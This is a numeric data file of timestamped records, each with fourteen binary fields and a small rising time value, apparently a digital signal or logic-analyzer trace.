1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9419036e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9419060e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9419088e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9419112e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9419140e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9419164e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9419188e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9419212e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9419236e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9419260e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9419288e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9419312e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9419336e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9419364e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9419388e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9419412e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9419436e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9419460e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9419468e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,2.9419484e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9419512e-02 1,1,1,1,0,1,0,0,0,0,0,0,0,0,2.9419516e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9419520e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9419540e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9419564e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,2.9419612e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9419636e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9419644e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9419660e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9419684e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9419712e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9419736e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9419764e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9419788e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9419812e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9419836e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9419888e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9419912e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9419964e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9419988e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9420036e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9420060e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9420112e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9420140e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9420164e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9420188e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9420212e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9420236e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9420288e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9420312e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9420316e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,2.9420364e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9420388e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9420396e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9420436e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9420460e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9420512e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9420540e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9420564e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9420588e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9420612e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9420636e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9420660e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9420684e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9420712e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9420736e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9420764e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9420788e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9420812e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9420836e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9420860e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9420884e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9420912e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9420936e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9420964e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9420988e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9421012e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9421036e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9421060e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9421084e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9421140e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9421164e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9421212e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9421236e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9421288e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9421312e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9421364e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9421388e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9421412e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9421436e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9421460e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9421484e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9421512e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9421536e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9421588e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9421612e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9421660e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9421688e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9421740e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9421764e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9421812e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9421836e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9421860e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9421884e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9421912e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9421936e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9421964e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9421988e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9422012e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9422036e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9422060e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9422084e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9422112e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9422136e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9422164e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9422188e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9422212e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9422236e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9422260e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9422284e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9422312e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9422336e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9422364e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9422388e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9422412e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9422436e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9422460e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9422484e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9422512e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9422536e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9422560e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9422584e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9422612e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9422636e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9422660e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9422684e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9422708e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9422732e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9422760e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9422784e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9422812e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9422836e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9422860e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9422884e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9422908e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9422932e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9422960e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9422984e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9423012e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9423036e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9423060e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9423084e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9423108e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9423132e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9423160e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9423184e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9423212e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9423236e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9423260e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9423284e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9423312e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9423340e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9423364e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9423388e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.9423412e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.9423440e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.9423444e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,2.9547520e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,1,2.9547708e-02 0,0,0,0,0,1,0,0,0,1,0,0,0,1,2.9547712e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,2.9547732e-02 0,0,0,0,1,1,0,0,0,1,0,1,0,1,2.9547764e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,2.9547788e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,1,2.9548116e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,2.9548140e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,2.9548148e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,2.9548168e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,2.9548192e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,2.9548216e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,2.9548244e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,2.9548268e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,2.9548292e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,2.9548316e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,2.9548340e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9548352e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9548368e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9548392e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9548420e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9548444e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9548468e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9548492e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9548516e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9548540e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9548568e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9548592e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9548596e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9548644e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9548668e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9548676e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9548692e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9548716e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9548740e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9548768e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9548792e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9548820e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9548868e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9548892e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9548900e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9548916e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9548940e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9548968e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9548992e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9549020e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9549044e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9549068e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9549092e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9549100e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9549144e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9549168e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9549192e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9549220e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9549268e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9549292e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9549300e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9549340e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9549368e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9549372e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9549392e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9549420e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9549444e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9549468e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9549492e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9549516e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9549524e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9549568e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9549592e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9549620e-02 0,0,0,0,1,0,0,0,0,1,0,0,0,0,2.9549644e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9549648e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9549668e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9549692e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9549744e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9549768e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9549792e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9549820e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9549844e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9549868e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9549876e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9549892e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9549916e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9549940e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9549968e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9549992e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9550020e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9550044e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9550068e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9550092e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9550116e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9550168e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9550192e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9550196e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9550244e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9550268e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9550276e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9550316e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9550340e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9550368e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9550392e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9550420e-02 0,0,0,0,1,0,0,0,0,1,0,0,0,0,2.9550444e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9550448e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9550492e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9550516e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9550524e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9550568e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9550592e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9550596e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9550620e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9550644e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9550668e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9550692e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9550716e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9550740e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9550748e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9550796e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9550820e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9550844e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9550868e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9550892e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9550916e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9550940e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9550968e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9550992e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9551020e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9551044e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9551068e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9551092e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9551116e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9551140e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9551168e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9551192e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9551220e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9551244e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9551268e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9551292e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9551316e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9551340e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9551368e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9551372e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9551420e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9551444e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9551452e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9551468e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9551492e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9551516e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9551540e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9551568e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9551592e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9551644e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9551668e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9551672e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9551692e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9551716e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9551740e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9551768e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9551792e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9551820e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9551844e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9551868e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9551876e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9551916e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9551940e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9551968e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9551992e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9551996e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9552020e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9552044e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9552092e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9552116e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9552140e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9552168e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9552192e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9552220e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9552224e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9552244e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9552268e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9552292e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9552316e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9552340e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9552368e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9552392e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9552420e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9552444e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9552468e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9552492e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9552516e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9552540e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9552568e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9552592e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9552620e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9552644e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9552668e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9552692e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9552716e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9552768e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9552792e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9552796e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9552820e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9552844e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9552868e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9552892e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9552916e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9552940e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9552968e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9552992e-02 0,0,0,0,1,1,0,0,0,0,0,0,0,0,2.9552996e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9553000e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9553044e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9553068e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9553092e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9553116e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9553168e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9553192e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9553196e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9553220e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9553244e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9553268e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9553292e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9553316e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9553340e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9553368e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9553392e-02 0,0,0,0,1,1,0,0,0,0,0,0,0,0,2.9553396e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9553400e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9553444e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9553468e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9553492e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9553516e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9553540e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9553568e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9553592e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9553620e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9553644e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9553668e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9553692e-02 